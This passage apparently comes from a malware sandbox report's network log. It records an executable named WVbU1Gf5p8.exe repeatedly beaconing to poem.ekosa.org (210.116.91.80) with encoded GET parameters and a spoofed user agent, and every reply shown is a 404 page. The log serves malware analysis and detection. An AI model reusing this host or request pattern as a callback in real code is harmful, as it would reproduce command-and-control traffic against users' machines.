      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      157192.168.2.449937210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:28.391552925 CET5175OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:28.653543949 CET5176INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:28 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      158192.168.2.449938210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:28.923845053 CET5177OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:29.186045885 CET5177INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      159192.168.2.449939210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:29.571549892 CET5178OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:29.841411114 CET5179INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      16192.168.2.449780210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:05.903429985 CET291OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:06.166101933 CET296INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      160192.168.2.449940210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:30.108763933 CET5179OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:30.369923115 CET5180INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:30 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      161192.168.2.449941210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:30.643855095 CET5181OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:30.913028002 CET5181INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:30 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      162192.168.2.449942210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:31.297410965 CET5182OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:31.559371948 CET5183INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      163192.168.2.449943210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:31.827218056 CET5183OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:32.089320898 CET5184INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      164192.168.2.449944210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:32.360671997 CET5184OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:32.624397993 CET5185INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      165192.168.2.449945210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:33.004050016 CET5186OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:33.266020060 CET5186INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      166192.168.2.449946210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:33.530864000 CET5187OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
